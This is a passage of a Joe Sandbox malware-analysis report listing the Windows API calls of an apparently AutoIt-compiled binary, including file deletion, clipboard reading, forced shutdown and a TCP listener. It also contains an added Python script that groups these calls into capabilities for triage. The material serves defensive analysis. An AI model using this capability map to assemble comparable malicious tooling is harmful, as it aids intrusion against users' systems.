                                          • FileTimeToSystemTime.KERNEL32(?,?), ref: 00EB6AB2
                                          • FileTimeToSystemTime.KERNEL32(?,?), ref: 00EB6ADF
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: Time$File$FindLocalSystem$CloseFirst_wcslen
                                          • String ID: %02d$%03d$%4d$%4d%02d%02d%02d%02d%02d$%4d%02d%02d%02d%02d%02d%03d
                                          • API String ID: 3830820486-3289030164
                                          • Opcode ID: cb82f0b20df9ab2a6d69cac5f7e861d4ab3a9a3de641bb088c79f84dff4de4b6
                                          • Instruction ID: 7207e7a5f80b42f7a5d6624915460cff32c8031bddc64e36fb570d1e61b40e8b
                                          • Opcode Fuzzy Hash: cb82f0b20df9ab2a6d69cac5f7e861d4ab3a9a3de641bb088c79f84dff4de4b6
                                          • Instruction Fuzzy Hash: 77D14271508300AFC714EBA4D891EAFB7ECAF88704F44591DF585E7192EB78DA48CB62
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • FindFirstFileW.KERNEL32(?,?), ref: 00EB9663
                                          • GetFileAttributesW.KERNEL32 ref: 00EB96A1
                                          • SetFileAttributesW.KERNEL32 ref: 00EB96BB
                                          • FindNextFileW.KERNEL32(00000000,?), ref: 00EB96D3
                                          • FindClose.KERNEL32(00000000), ref: 00EB96DE
                                          • FindFirstFileW.KERNEL32(*.*,?), ref: 00EB96FA
                                          • SetCurrentDirectoryW.KERNEL32 ref: 00EB974A
                                          • SetCurrentDirectoryW.KERNEL32 ref: 00EB9768
                                          • FindNextFileW.KERNEL32(00000000,00000010), ref: 00EB9772
                                          • FindClose.KERNEL32(00000000), ref: 00EB977F
                                          • FindClose.KERNEL32(00000000), ref: 00EB978F
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
                                          • String ID: *.*
                                          • API String ID: 1409584000-438819550
                                          • Opcode ID: c5368aac009b2882671d91a76362d834c48f6f1c1e0d66220677198b6e9d288d
                                          • Instruction ID: 477f0aeabb417e520eca6b65039dc6e0fe1a440efb38c0746422e3dfc3f58c3c
                                          • Opcode Fuzzy Hash: c5368aac009b2882671d91a76362d834c48f6f1c1e0d66220677198b6e9d288d
                                          • Instruction Fuzzy Hash: 3F31D07264161A6ECB20AFB5EC48ADF77ECDF49364F205157FA04F21A1EB34D944CA50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • FindFirstFileW.KERNEL32(?,?), ref: 00EB97BE
                                          • FindNextFileW.KERNEL32(00000000,?), ref: 00EB9819
                                          • FindClose.KERNEL32(00000000), ref: 00EB9824
                                          • FindFirstFileW.KERNEL32(*.*,?), ref: 00EB9840
                                          • SetCurrentDirectoryW.KERNEL32 ref: 00EB9890
                                          • SetCurrentDirectoryW.KERNEL32 ref: 00EB98AE
                                          • FindNextFileW.KERNEL32(00000000,00000010), ref: 00EB98B8
                                          • FindClose.KERNEL32(00000000), ref: 00EB98C5
                                          • FindClose.KERNEL32(00000000), ref: 00EB98D5
                                            • Part of subcall function 00EADAE5: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00EADB00
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
                                          • String ID: *.*
                                          • API String ID: 2640511053-438819550
                                          • Opcode ID: c2363b867b95f64ad2523ae09c5c1e8bf9863d396c5430e6cc840b6667743050
                                          • Instruction ID: ed3aba3130f830c6eb02f0d6be297807dbd4a13ef59cc3e153c186fa3e1e084a
                                          • Opcode Fuzzy Hash: c2363b867b95f64ad2523ae09c5c1e8bf9863d396c5430e6cc840b6667743050
                                          • Instruction Fuzzy Hash: 7A31F27254161A6EDB24AFB4EC48ADF77BCDF0A364F205166EA00F20A1DB30D948DB60
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                            • Part of subcall function 00E43AA2: GetFullPathNameW.KERNEL32 ref: 00E43AC2
                                            • Part of subcall function 00EAE199: GetFileAttributesW.KERNEL32 ref: 00EAE19A
                                          • FindFirstFileW.KERNEL32(?,?), ref: 00EAD122
                                          • DeleteFileW.KERNEL32 ref: 00EAD1DD
                                          • MoveFileW.KERNEL32 ref: 00EAD1F0
                                          • DeleteFileW.KERNEL32 ref: 00EAD20D
                                          • FindNextFileW.KERNEL32(00000000,00000010), ref: 00EAD237
                                            • Part of subcall function 00EAD29C: CopyFileExW.KERNEL32(?,?,00000000,00000000,00000000,00000008), ref: 00EAD2B2
                                          • FindClose.KERNEL32(00000000), ref: 00EAD253
                                          • FindClose.KERNEL32(00000000), ref: 00EAD264
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: File$Find$CloseDelete$AttributesCopyFirstFullMoveNameNextPath
                                          • String ID: \*.*
                                          • API String ID: 1946585618-1173974218
                                          • Opcode ID: ba7fc205b6547c51bcca324981bf54fa493701e81ee7fb1aaf12a549e0988d97
                                          • Instruction ID: 3cd9308bcbdbfe248c167277da91c0cb89bb5cad4f5cc9fd2ce2f6ef014fa0b8
                                          • Opcode Fuzzy Hash: ba7fc205b6547c51bcca324981bf54fa493701e81ee7fb1aaf12a549e0988d97
                                          • Instruction Fuzzy Hash: CB615D31C0610D9ECF05EBE0ED92AEDB7B5AF5A304F245165E4027B1A2EB346F09DB60
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                          • String ID:
                                          • API String ID: 1737998785-0
                                          • Opcode ID: 9da623f1393b692299d7c3dbe53b0839800dcf5bfdb2a2f781dc11aca17ffbd1
                                          • Instruction ID: ded7399f6d92ae488658a5e73f8b543b15343829dab0b48a17c384bb6301141e
                                          • Opcode Fuzzy Hash: 9da623f1393b692299d7c3dbe53b0839800dcf5bfdb2a2f781dc11aca17ffbd1
                                          • Instruction Fuzzy Hash: 4D41EF30205612AFD310CF26E888B9ABBE5FF44358F24E099E425AB762C775EC41CBC0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                            • Part of subcall function 00EA16C3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00EA170D
                                            • Part of subcall function 00EA16C3: AdjustTokenPrivileges.ADVAPI32 ref: 00EA173A
                                            • Part of subcall function 00EA16C3: GetLastError.KERNEL32 ref: 00EA174A
                                          • ExitWindowsEx.USER32(?,00000000), ref: 00EAE932
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                          • String ID: $ $@$SeShutdownPrivilege
                                          • API String ID: 2234035333-3163812486
                                          • Opcode ID: 4975ece6f32a3a6b1fd7ed23b818f19019c737d1c82475be0533af2deec58a2f
                                          • Instruction ID: e61f3434aae2fd4143754d1ed7b0e95a82bbdbdb8e4d2e9138c538f8ecc64f9c
                                          • Opcode Fuzzy Hash: 4975ece6f32a3a6b1fd7ed23b818f19019c737d1c82475be0533af2deec58a2f
                                          • Instruction Fuzzy Hash: 0C012632610311AFEB1422B9AC86BFB729C9B4E784F2464A2FC02FA2D1D5A07C4481A0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 00EC1276
                                          • WSAGetLastError.WSOCK32 ref: 00EC1283
                                          • bind.WSOCK32(00000000,?,00000010), ref: 00EC12BA
                                          • WSAGetLastError.WSOCK32 ref: 00EC12C5
                                          • closesocket.WSOCK32(00000000), ref: 00EC12F4
                                          • listen.WSOCK32(00000000,00000005), ref: 00EC1303
                                          • WSAGetLastError.WSOCK32 ref: 00EC130D
                                          • closesocket.WSOCK32(00000000), ref: 00EC133C
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: ErrorLast$closesocket$bindlistensocket
                                          • String ID:
                                          • API String ID: 540024437-0
                                          • Opcode ID: 9d5f819410692149e0ad9b1c110e98181f675e73a8dff4899b2d38919c886681
                                          • Instruction ID: dd0dee481eea1b26f553316639560b5a868a9ee7da30f535b43d184769e20fce
                                          • Opcode Fuzzy Hash: 9d5f819410692149e0ad9b1c110e98181f675e73a8dff4899b2d38919c886681
                                          • Instruction Fuzzy Hash: A041A0356001419FD714DF24D584F29BBE5EF46318F28918DD856AF2A3C732EC86DBA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%
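The function blocks above (token duplication with LogonUserW/DuplicateTokenEx and the winsta0/default window-station and desktop handles, the DACL edit via AddAce/SetUserObjectSecurity, the clipboard read for CF_UNICODETEXT/CF_TEXT/CF_HDROP, the FindFirstFileW/FindNextFileW walks, the SeShutdownPrivilege/ExitWindowsEx path and the socket/bind/listen sequence) are easier to triage when the raw "APIs" lists are grouped per function and mapped to capabilities. The script below is an added example, not Joe Sandbox output and not code from the report; it parses a constructed excerpt in the report's own line format (lines copied from the blocks above), and the capability labels are this example's own choice, while the decoded constant names (CF_TEXT, CF_UNICODETEXT, CF_HDROP, AF_INET, SOCK_STREAM, IPPROTO_TCP) are the documented Win32 values. One caveat when reading its output: the report flags the binary as a likely compiled AutoIt script, so a capability hit shows that the code is present in the binary, not that this script exercised it; the behavioural signatures at the top of the report are the record of what actually ran.

```python
"""Added triage helper for Joe Sandbox "APIs" annotations (not part of the
report or of Joe Sandbox): group calls per function, map them to capabilities."""
import re

# Constructed excerpt: API lines copied from the function blocks above, in the
# report's own format; a "Strings" or "Memory Dump Source" header closes a block.
REPORT_EXCERPT = """
APIs
  • Part of subcall function 00EA16C3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00EA170D
  • Part of subcall function 00EA16C3: AdjustTokenPrivileges.ADVAPI32 ref: 00EA173A
• LogonUserW.ADVAPI32(?,?,?,00000000,00000000,?), ref: 00EA1286
• DuplicateTokenEx.ADVAPI32 ref: 00EA12A8
• OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 00EA12D1
• OpenDesktopW.USER32 ref: 00EA1310
Strings
APIs
• OpenClipboard.USER32(00EDCC08), ref: 00EBEB29
• IsClipboardFormatAvailable.USER32(0000000D), ref: 00EBEB37
• GetClipboardData.USER32 ref: 00EBEB43
• IsClipboardFormatAvailable.USER32(0000000F), ref: 00EBEC38
• CloseClipboard.USER32 ref: 00EBED59
Memory Dump Source
APIs
• ExitWindowsEx.USER32(?,00000000), ref: 00EAE932
Strings
APIs
• socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 00EC1276
• bind.WSOCK32(00000000,?,00000010), ref: 00EC12BA
• listen.WSOCK32(00000000,00000005), ref: 00EC1303
Memory Dump Source
"""

API_LINE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-F]{6,8}):\s*)?"
    r"(?P<api>[A-Za-z_]\w*)\.(?P<mod>\w+)(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]{6,8})\s*$"
)
BLOCK_END = {"Strings", "Memory Dump Source"}

# A capability fires when every listed API occurs in one function (direct calls
# or the report's "Part of subcall" entries). Labels are this example's own.
CAPABILITIES = {
    "privilege adjustment": {"LookupPrivilegeValueW", "AdjustTokenPrivileges"},
    "logon/impersonation token (RunAs pattern)": {"LogonUserW", "DuplicateTokenEx"},
    "window station/desktop access": {"OpenWindowStationW", "OpenDesktopW"},
    "window station DACL modification": {"AddAce", "SetUserObjectSecurity"},
    "clipboard read": {"OpenClipboard", "GetClipboardData"},
    "recursive file enumeration": {"FindFirstFileW", "FindNextFileW"},
    "shutdown/logoff": {"ExitWindowsEx"},
    "TCP listener": {"socket", "bind", "listen"},
}
CLIPBOARD_FORMATS = {0x1: "CF_TEXT", 0xD: "CF_UNICODETEXT", 0xF: "CF_HDROP"}

def _hex(tok: str):
    try:
        return int(tok, 16)
    except ValueError:  # "?" marks an argument the analyzer could not resolve
        return None

def decode_args(api: str, args: str) -> str:
    """Name the numeric arguments of the calls whose constants tell the story."""
    toks = [t.strip() for t in args.split(",")] if args else []
    if api == "IsClipboardFormatAvailable" and toks:
        fmt = _hex(toks[0])
        return "format ?" if fmt is None else CLIPBOARD_FORMATS.get(fmt, f"format 0x{fmt:X}")
    if api == "socket" and len(toks) >= 3:
        af, typ, proto = (_hex(t) for t in toks[:3])
        return "/".join(["AF_INET" if af == 2 else f"af={af}",
                         "SOCK_STREAM" if typ == 1 else f"type={typ}",
                         "IPPROTO_TCP" if proto == 6 else f"proto={proto}"])
    return ""

def parse_functions(text: str) -> list:
    """One dict per 'APIs' block that lists at least one call."""
    funcs, cur = [], None
    for line in text.splitlines():
        s = line.strip()
        if s == "APIs":
            cur = {"direct": [], "subcall": [], "details": []}
            funcs.append(cur)
        elif s in BLOCK_END:
            cur = None
        elif cur is not None and (m := API_LINE.match(line)):
            entry = (m["api"], m["mod"], m["ref"])
            (cur["subcall"] if m["sub"] else cur["direct"]).append(entry)
            if note := decode_args(m["api"], m["args"] or ""):
                cur["details"].append(f"{m['api']} -> {note}")
    return [f for f in funcs if f["direct"] or f["subcall"]]

def classify(func: dict) -> list:
    seen = {api for api, _, _ in func["direct"] + func["subcall"]}
    return sorted(cap for cap, need in CAPABILITIES.items() if need <= seen)

def triage(text: str) -> list:
    """Capabilities and decoded arguments per function, keyed by its code range."""
    out = []
    for f in parse_functions(text):
        refs = [int(r, 16) for _, _, r in (f["direct"] or f["subcall"])]
        out.append({"ref_range": (f"{min(refs):08X}", f"{max(refs):08X}"),
                    "capabilities": classify(f), "details": f["details"]})
    return out

if __name__ == "__main__":
    for fn in triage(REPORT_EXCERPT):
        print(*fn["ref_range"], "|", ", ".join(fn["capabilities"]), "|", fn["details"])
```

Run against the full report text rather than the excerpt, the same parser covers every "APIs" block on the page; the subcall entries are kept separate from direct calls so that a shared helper such as 00EA16C3 (the privilege-adjust routine that both the RunAs and the ExitWindowsEx paths use) does not make two unrelated functions look identical.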

                                          APIs
                                            • Part of subcall function 00E59BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00E59BB2
                                          • DefDlgProcW.USER32(?,?,?,?,?), ref: 00E59A4E
                                          • GetSysColor.USER32 ref: 00E59B23
                                          • SetBkColor.GDI32(?,00000000), ref: 00E59B36
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: Color$LongProcWindow
                                          • String ID: 6ofs
                                          • API String ID: 3131106179-1294211291
                                          • Opcode ID: 213502412a30f1875ae5b618d1ba164bc9f80fc7f00d9c6b2d1653436be6ecb7
                                          • Instruction ID: e991aa8b500467bcff86a0bf8d9b0af14f6a31608b24ad48844238fbb28bfacc
                                          • Opcode Fuzzy Hash: 213502412a30f1875ae5b618d1ba164bc9f80fc7f00d9c6b2d1653436be6ecb7
                                          • Instruction Fuzzy Hash: 36A15CB0218144FEEB289A3C8C48DFB369DEB42346F15790AF942F66D3CA259D0DD275
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: _free$ByteCharMultiWide$InformationTimeZone
                                          • String ID:
                                          • API String ID: 314583886-0
                                          • Opcode ID: 994b9e03b0a556bee50e43737df12220a109f4212d7a83f2ab11239ad0c7b79c
                                          • Instruction ID: d468f0c2463efc6ff6d7f69f517233c935cf313bbbe0b12fdb3351fc60f3a14a
                                          • Opcode Fuzzy Hash: 994b9e03b0a556bee50e43737df12220a109f4212d7a83f2ab11239ad0c7b79c
                                          • Instruction Fuzzy Hash: 88C12771904249AFDB21EF789C41BAABBF8EF41314F14E19AE998F7251E7308E41D750
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                            • Part of subcall function 00E43AA2: GetFullPathNameW.KERNEL32 ref: 00E43AC2
                                            • Part of subcall function 00EAE199: GetFileAttributesW.KERNEL32 ref: 00EAE19A
                                          • FindFirstFileW.KERNEL32(?,?), ref: 00EAD420
                                          • DeleteFileW.KERNEL32 ref: 00EAD470
                                          • FindNextFileW.KERNEL32(00000000,00000010), ref: 00EAD481
                                          • FindClose.KERNEL32(00000000), ref: 00EAD498
                                          • FindClose.KERNEL32(00000000), ref: 00EAD4A1
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
                                          • String ID: \*.*
                                          • API String ID: 2649000838-1173974218
                                          • Opcode ID: eda246a229c0365aa2ed2d573acdb73c9e790d6ae7833c3e1b999b590a68e9ff
                                          • Instruction ID: b05f46a3ac9404aaf104b11cddc43c038a40aebe69984c735607053de94f0c40
                                          • Opcode Fuzzy Hash: eda246a229c0365aa2ed2d573acdb73c9e790d6ae7833c3e1b999b590a68e9ff
                                          • Instruction Fuzzy Hash: E531727100D3459FC304EF64E8558AF77E8AE9A314F446A2DF4E2631A1EB30AA09D763
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: __floor_pentium4
                                          • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                          • API String ID: 4168288129-2761157908
                                          • Opcode ID: c042906b44b52d05239c06e5fd8d32ccc7da0edd1f8ba3f852942a8c388dc3af
                                          • Instruction ID: 58a0f769a54dbd9bfde5d09c8e8f59e997df20bc96f32fa46e0062ab8b5b5e98
                                          • Opcode Fuzzy Hash: c042906b44b52d05239c06e5fd8d32ccc7da0edd1f8ba3f852942a8c388dc3af
                                          • Instruction Fuzzy Hash: D9C22972E086298FDB29CE28DD407EAB7B5EB49305F1491EAD44DF7241E774AE818F40
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: CreateInitializeInstanceUninitialize_wcslen
                                          • String ID: .lnk
                                          • API String ID: 886957087-24824748
                                          • Opcode ID: fe8ef9693371eac7437e0c73065c1cd0df05249df03aa415dcaf6ff40f9835b7
                                          • Instruction ID: 02cd940b522b5d10f01e5dbef5662dde1e220d0bf1849d1a1ec407f7d4b10e2c
                                          • Opcode Fuzzy Hash: fe8ef9693371eac7437e0c73065c1cd0df05249df03aa415dcaf6ff40f9835b7
                                          • Instruction Fuzzy Hash: C7D159716093019FC314EF24D881DABB7E8FF98304F14596DF595AB2A2DB31E909CB92
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • GetForegroundWindow.USER32 ref: 00EC22E8
                                            • Part of subcall function 00EBE4EC: GetWindowRect.USER32(?,?), ref: 00EBE504
                                          • GetDesktopWindow.USER32 ref: 00EC2312
                                          • GetWindowRect.USER32(00000000), ref: 00EC2319
                                          • mouse_event.USER32(00008001,?,?,00000002,00000002), ref: 00EC2355
                                          • GetCursorPos.USER32(?), ref: 00EC2381
                                          • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00EC23DF
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: Window$Rectmouse_event$CursorDesktopForeground
                                          • String ID:
                                          • API String ID: 2387181109-0
                                          • Opcode ID: 37a9a07ca519b937aa0d9ffbd10db3a1f52df991e58420d3fe5b8ab4b589edb2
                                          • Instruction ID: c8e071173daab4885897037d8360d8b41836da500d2418ea1a607264b72aa621
                                          • Opcode Fuzzy Hash: 37a9a07ca519b937aa0d9ffbd10db3a1f52df991e58420d3fe5b8ab4b589edb2
                                          • Instruction Fuzzy Hash: 2031DE72105346AFCB20DF19D904F9BB7A9FB88714F10191EF984A7181DA35E909CB92
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                            • Part of subcall function 00EC304E: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 00EC307A
                                            • Part of subcall function 00EC304E: _wcslen.LIBCMT ref: 00EC309B
                                          • socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 00EC185D
                                          • WSAGetLastError.WSOCK32 ref: 00EC1884
                                          • bind.WSOCK32(00000000,?,00000010), ref: 00EC18DB
                                          • WSAGetLastError.WSOCK32 ref: 00EC18E6
                                          • closesocket.WSOCK32(00000000), ref: 00EC1915
                                          Memory Dump Source
